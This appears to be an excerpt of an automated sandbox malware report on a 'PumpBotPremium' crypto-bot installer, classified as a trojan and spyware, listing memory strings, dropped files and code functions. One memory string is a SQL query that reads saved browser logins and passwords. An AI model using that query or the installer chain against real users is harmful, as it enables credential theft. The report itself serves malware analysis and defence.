Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894671378.0000019A0D394000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905833021.0000019A0D395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_79.htm
Source: BlockchainConnector.exe, 00000007.00000003.1894671378.0000019A0D394000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905833021.0000019A0D395000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_83.htm
Source: BlockchainConnector.exe, 00000007.00000003.1893567877.0000019A0D397000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D64F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://personal.math.ubc.ca/~cbm/aands/page_86.htm
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pjreddie.com/darknet/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pjreddie.com/darknet/)
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://pyopenssl.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://pyopenssl.org/a__uri__uPython
Source: BlockchainConnector.exe, 00000007.00000002.1907183150.0000019A14380000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://pyperclip.readthedocs.io/en/latest/index.html#not-implemented-error
Source: BlockchainConnector.exe, 00000007.00000002.1905482456.0000019A0CD30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D584000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://scipy-cookbook.readthedocs.io/items/Ctypes.html
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://software.intel.com/openvino-toolkit)
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/18905702/python-ctypes-and-mutable-buffers
Source: BlockchainConnector.exe, 00000007.00000002.1904176562.0000019A0BF30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/4457745#4457745.
Source: BlockchainConnector.exe, 00000007.00000002.1907079477.0000019A141E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/questions/455434/how-should-i-use-formatmessage-properly-in-c
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stat.ethz.ch/~stahel/lognormal/bioscience.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.aminer.org/pdf/PDF/000/317/196/spatio_temporal_wiener_filtering_of_image_sequences_us
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D78CC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://streams.videolan.org/upload/
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
Source: BlockchainConnector.exe, 00000007.00000003.1894585571.0000019A0C243000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1B0000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894628577.0000019A0C246000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904396374.0000019A0C247000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc3610
Source: BlockchainConnector.exe, 00000007.00000002.1905324569.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D1F8000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893700605.0000019A0CB6D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tools.ietf.org/html/rfc5297
Source: BlockchainConnector.exe, 00000007.00000003.1894022452.0000019A0BED4000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904035119.0000019A0BE30000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904141147.0000019A0BED9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: BlockchainConnector.exe, 00000007.00000002.1904689424.0000019A0C530000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: BlockchainConnector.exe, 00000007.00000002.1905407661.0000019A0CC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/contrib.html#socks-proxies
Source: BlockchainConnector.exe, 00000007.00000002.1904852848.0000019A0C730000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
Source: BlockchainConnector.exe, 00000007.00000003.1894257723.0000019A09F8E000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1903643435.0000019A09F91000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D485000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20080221202153/https://www.math.hmc.edu/~benjamin/papers/CombTrig.pdf
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20090423014010/http://www.brighton-webs.co.uk:80/distributions/wald.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20090514091424/http://brighton-webs.co.uk:80/distributions/rayleigh.asp
Source: BlockchainConnector.exe, 00000007.00000002.1906290521.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000003.1893898051.0000019A0D65B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.archive.org/web/20120328125543/http://www.jpegcameras.com/libjpeg/libjpeg-3.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://web.archive.org/web/20170802060935/http://oss.sgi.com/projects/ogl-sample/registry/EXT/textu
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.cazabon.com
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.cazabon.com/pyCMS
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cs.hmc.edu/tr/hmc-cs-2014-0905.pdf
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.ibm.com/
Source: BlockchainConnector.exe, 00000007.00000003.1893352229.0000019A0D26A000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1905706503.0000019A0D279000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.ietf.org/rfc/rfc2898.txt
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3663.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.itl.nist.gov/div898/handbook/eda/section3/eda3666.htm
Source: BlockchainConnector.exe, 00000007.00000002.1906001116.0000019A0D5A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/powpdf.pdf
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.learnopencv.com/convex-hull-using-opencv-in-python-and-c/copyMatAndDumpNamedArgumentsOOO
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.littlecms.com
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mathworks.com/help/techdoc/ref/rank.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.mia.uni-saarland.de/Publications/gwosdek-ssvm11.pdf
Source: BlockchainConnector.exe, 00000007.00000003.1893811664.0000019A0C2F1000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000002.1904501910.0000019A0C2F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.openblas.net/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_VERIFY_PARAM_set_flags.html
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.openssl.org/docs/manmaster/man3/X509_verify_cert_error_string.html#ERROR-CODES
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.openssl.org/docs/manmaster/man5/
Source: BlockchainConnector.exe, 00000007.00000002.1904081490.0000019A0BE63000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894339402.0000019A0BE61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: BlockchainConnector.exe, 00000007.00000002.1905042748.0000019A0C93C000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1894056234.0000019A0C938000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000003.1893415079.0000019A0C8AF000.00000004.00000020.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.python.org/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1904607572.0000019A0C430000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp, BlockchainConnector.exe, 00000007.00000002.1906987998.0000019A13FC0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0506/
Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp, BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tensorflow.org/
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tensorflow.org/)
Source: BlockchainConnector.exe, 00000004.00000003.1829850821.0000022D7614D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.tensorflow.org/lite
Source: BlockchainConnector.exe, 00000007.00000000.1845014184.00007FF7A34E8000.00000002.00000001.01000000.00000006.sdmp	String found in binary or memory: https://www.usenix.org/legacy/events/usenix99/provos/provos_html/node4.html

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_0021BD60 GetForegroundWindow,MessageBoxW,GetCurrentProcess,OpenProcessToken,CloseHandle,GetLastError,ExitWindowsEx,CloseHandle,

3_2_0021BD60

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5c7177.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7B99.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7BF7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C27.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C48.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7C87.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7CB7.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{26BCD435-D353-42A0-8C43-818FC0FA354F}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI7D93.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5c717a.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\5c717a.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8554.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI8CB8.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	File created: C:\Windows\SystemTemp\AI_D021.tmp	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	File created: C:\Windows\SystemTemp\AI_D021.ps1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77003E887FC21E505B9E28CBA30E18ED_8ACE642DC0A43382FABA7AE806561A50	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\86844F70250DD8EF225D6B4178798C21_44AD5D0C299F1D4EE038B125B5E5863A	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94D97B1EC1F43DD6ED4FE7AB95E144BC_939EA6CA157B394821E4828989A41A02	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07A7CCFBD28A674D95D3BF853C9007C6	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07A7CCFBD28A674D95D3BF853C9007C6	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI7B99.tmp

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0021A450	3_2_0021A450
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0021B3F0	3_2_0021B3F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0024BFE0	3_2_0024BFE0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00286067	3_2_00286067
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00298099	3_2_00298099
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0021E220	3_2_0021E220
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0026C330	3_2_0026C330
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0028E34D	3_2_0028E34D
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00282410	3_2_00282410
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0021E470	3_2_0021E470
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002766B0	3_2_002766B0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002116C0	3_2_002116C0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002629E0	3_2_002629E0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0023CA10	3_2_0023CA10
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00276AB0	3_2_00276AB0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00266BA0	3_2_00266BA0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00276C60	3_2_00276C60
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00270CE0	3_2_00270CE0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00274E30	3_2_00274E30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00274F50	3_2_00274F50
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00272F90	3_2_00272F90
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00273030	3_2_00273030
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_002910D9	3_2_002910D9
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0028F26A	3_2_0028F26A
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00215410	3_2_00215410
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0023B650	3_2_0023B650
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00261680	3_2_00261680
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0023B760	3_2_0023B760
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00231920	3_2_00231920
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0023F960	3_2_0023F960
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_0026D9F0	3_2_0026D9F0
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00277B30	3_2_00277B30
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: 3_2_00285CD9	3_2_00285CD9

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_Salsa20.pyd E63D4123D894B61E0242D53813307FA1FF3B7B60818827520F7FF20CABCD8904
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\onefile_7560_133747959131729392\Crypto\Cipher\_raw_aes.pyd C438DD66FA669430CCE11B2ACB7DC0EE72B7953B07013FDA6BF6B803C2C961F9

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: String function: 00215150 appears 64 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: String function: 00214E80 appears 65 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: String function: 0027D250 appears 54 times
Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe	Code function: String function: 00213540 appears 50 times

Source: unicodedata.pyd.4.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: BlockchainConnector.exe.2.dr	Static PE information: Number of sections : 12 > 10
Source: opencv_videoio_ffmpeg490_64.dll.4.dr	Static PE information: Number of sections : 13 > 10
Source: libopenblas.EL2C6PLE4ZYW3ECEVIV3OXXGRN2NRFM2.gfortran-win_amd64.dll.4.dr	Static PE information: Number of sections : 19 > 10
Source: cv2.pyd.4.dr	Static PE information: Number of sections : 15 > 10
Source: BlockchainConnector.exe.4.dr	Static PE information: Number of sections : 12 > 10

Source: python3.dll.4.dr

Static PE information: No import functions for PE file found

Source: qt5core.dll.4.dr

Static PE information: Section: .qtmimed ZLIB complexity 0.997458770800317

Source: classification engine

Classification label: mal92.troj.spyw.evad.winMSI@28/152@1/1

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_002373A0 FormatMessageW,GetLastError,

3_2_002373A0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00255AF0 GetDiskFreeSpaceExW,

3_2_00255AF0

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_0025E870 CoCreateInstance,

3_2_0025E870

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Code function: 3_2_00230620 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,

3_2_00230620

Source: C:\Windows\System32\msiexec.exe

File created: C:\Program Files (x86)\Coinsw.app

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe

File created: C:\Users\user\AppData\Roaming\Coinsw.app

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7580:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8000:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6212:120:WilError_03

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\TEMP\~DF47F5555B91963625.TMP

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

File read: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Coinsw.app\PumpBotPremium\prerequisites\aipackagechainer.exe

Key opened: HKEY_USERSS-1-5-18\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: BlockchainConnector.exe, 00000007.00000002.1903874516.0000019A0BC30000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: SELECT action_url, username_value, password_value FROM logins;

Source: PumpBotPremium.msi

ReversingLabs: Detection: 13%

